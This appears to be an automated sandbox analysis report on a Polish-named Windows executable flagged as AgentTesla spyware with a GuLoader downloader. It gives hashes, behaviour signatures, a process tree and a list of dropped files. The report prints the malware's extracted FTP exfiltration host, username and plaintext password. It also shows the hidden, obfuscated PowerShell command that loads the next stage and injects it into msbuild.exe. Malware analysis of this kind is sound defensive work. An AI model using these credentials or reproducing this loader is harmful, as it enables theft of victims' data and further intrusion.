Overview

overview

10

Static

static

1

Zamówieni...66.exe

windows7-x64

10

Zamówieni...66.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    143s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20231020-en
  • resource tags

    arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system
  • submitted
    07-12-2023 07:30

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Zamówienie.ZD33166.exe

  • Size

    698KB

  • MD5

    16d009c42496db59b33e6723f913d0c9

  • SHA1

    bed0f6cf09e6bc16190e694d493f891732816e8d

  • SHA256

    d6d400c0847a1893dea669a1c8cfee475cafd9439bc50c694eaccbc04211a0e7

  • SHA512

    02853827c4d99c441c1daf2d22d0da23f42115e7da66396dc9794017322502aee37d2573acc9bf0c3ec300db6697b49ffd3568d1a8544c39973c613daa7f64e3

  • SSDEEP

    12288:UwFGHEN1Sn2VNDyu0AP/0wGc/fMz3rzNI3ylgimtdYM3O0V7bby:U5HEN16kh01w3sZlgZtub0V7q

Score
10/10
agentteslaguloaderdownloaderkeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:     ftp
  • Host:
    ftp://ftp.omamontaggi.it
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    pass@A12345@

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Zamówienie.ZD33166.exe
    "C:\Users\Admin\AppData\Local\Temp\Zamówienie.ZD33166.exe"
    1⤵
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:1576
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Tiljublingens=Get-Content 'C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Balletdanserindernes\Exudatory\Falskspillerens.Ill';$Konferenserne=$Tiljublingens.SubString(48125,3);.$Konferenserne($Tiljublingens)"
      2⤵
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2512
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
        3⤵
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2644

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
    Filesize

    65KB

    MD5

    ac05d27423a85adc1622c714f2cb6184

    SHA1

    b0fe2b1abddb97837ea0195be70ab2ff14d43198

    SHA256

    c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

    SHA512

    6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    207588a0b40253d569791830f5571745

    SHA1

    0b99068c64839ad5ffcdd6b277316983ca13d6a8

    SHA256

    fae37b926de91b4b79f4d3465c0f12bdcd98e0363b9d078e6443f264a5ec107e

    SHA512

    0424dffaed77da8745de36b8f04cb129b15c3ef4bfc44277d8c6ea3f9b33c8abcbdbb758d9173c6916372601f060160b2bf8af5b2b53c7ae2bf060570c45a929

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\CabFF96.tmp
    Filesize

    61KB

    MD5

    f3441b8572aae8801c04f3060b550443

    SHA1

    4ef0a35436125d6821831ef36c28ffaf196cda15

    SHA256

    6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

    SHA512

    5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Rkkens.ini
    Filesize

    32B

    MD5

    a8ca1db6ae34f5e5c152094f44f92476

    SHA1

    9fe0fd4e6907c4f9099d2533c3bade4ffa0968e7

    SHA256

    1f0dbc97d6570f2f5a1e18f82842c9a0007e568ca8fb768c123637ef5077aad3

    SHA512

    e48e987e1f8297b17f7fb5b8b34da6131156834310987600b20b0dcff4c43632ccb4b2305030a4a999f783176d480c8300e6aef92afbb2032379eca6dac88b5a

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\TarE4.tmp
    Filesize

    171KB

    MD5

    9c0c641c06238516f27941aa1166d427

    SHA1

    64cd549fb8cf014fcd9312aa7a5b023847b6c977

    SHA256

    4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

    SHA512

    936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

    Download Submit

  • C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Balletdanserindernes\Exudatory\Falskspillerens.Ill
    Filesize

    47KB

    MD5

    fa2b04b706a4a1a50a3866e1fffb34f7

    SHA1

    0bf99926ab1aff752fd2325d7dadcf68440cda83

    SHA256

    d16797d1615df0383dab78a1e90f594439ae34c0f0cc9083e5883f42585718c5

    SHA512

    58097ca7d6c8145504b41807f2e0aa4b41aa4d5e58943d47455c7e60a5bc4288756503d5a93e3c2c362c5c5aa0c782af3cf30a6a10e206d498eed7e7ae993263

    Download Submit

  • C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Balletdanserindernes\Exudatory\Wreathless.You
    Filesize

    301KB

    MD5

    a7d050056af386ff8097a7effd1d9f6f

    SHA1

    008fafc028955c2bdab6508168135e42b1c2d437

    SHA256

    5270d655c8baee63673cce7a5d4c4bd8130d37dcc5a0688d5589913b96cc6d95

    SHA512

    7413802fcf4e35e690adef8718dfad2fc73848a3f5e9ea7bc9636795dce7cba8bf28022d28e9323041e2210a2ab413f48d1a990f2bb7b40bf42602b28788870d

    Download Submit

  • memory/2512-177-0x0000000004FC0000-0x0000000004FC4000-memory.dmp

    Filesize

    16KB

    Download

  • memory/2512-173-0x0000000002500000-0x0000000002540000-memory.dmp

    Filesize

    256KB

    Download

  • memory/2512-179-0x0000000005FD0000-0x0000000007A92000-memory.dmp

    Filesize

    26.8MB

    Download

  • memory/2512-180-0x0000000074320000-0x00000000748CB000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2512-181-0x0000000002500000-0x0000000002540000-memory.dmp

    Filesize

    256KB

    Download

  • memory/2512-182-0x0000000077A60000-0x0000000077C09000-memory.dmp

    Filesize

    1.7MB

    Download

  • memory/2512-183-0x0000000077C50000-0x0000000077D26000-memory.dmp

    Filesize

    856KB

    Download

  • memory/2512-185-0x0000000005FD0000-0x0000000007A92000-memory.dmp

    Filesize

    26.8MB

    Download

  • memory/2512-271-0x0000000005FD0000-0x0000000007A92000-memory.dmp

    Filesize

    26.8MB

    Download

  • memory/2512-170-0x0000000074320000-0x00000000748CB000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2512-171-0x0000000074320000-0x00000000748CB000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/2512-178-0x0000000005FD0000-0x0000000007A92000-memory.dmp

    Filesize

    26.8MB

    Download

  • memory/2512-172-0x0000000002500000-0x0000000002540000-memory.dmp

    Filesize

    256KB

    Download

  • memory/2644-188-0x000000006FE10000-0x0000000070E72000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2644-187-0x0000000077A60000-0x0000000077C09000-memory.dmp

    Filesize

    1.7MB

    Download

  • memory/2644-269-0x000000006FE10000-0x0000000070E72000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2644-270-0x0000000001360000-0x0000000002E22000-memory.dmp

    Filesize

    26.8MB

    Download

  • memory/2644-186-0x0000000001360000-0x0000000002E22000-memory.dmp

    Filesize

    26.8MB

    Download

  • memory/2644-272-0x000000006FE10000-0x000000006FE50000-memory.dmp

    Filesize

    256KB

    Download

  • memory/2644-273-0x000000006F5D0000-0x000000006FCBE000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/2644-275-0x000000001EB00000-0x000000001EB40000-memory.dmp

    Filesize

    256KB

    Download

  • memory/2644-274-0x0000000001360000-0x0000000002E22000-memory.dmp

    Filesize

    26.8MB

    Download

  • memory/2644-278-0x000000006F5D0000-0x000000006FCBE000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/2644-280-0x000000001EB00000-0x000000001EB40000-memory.dmp

    Filesize

    256KB

    Download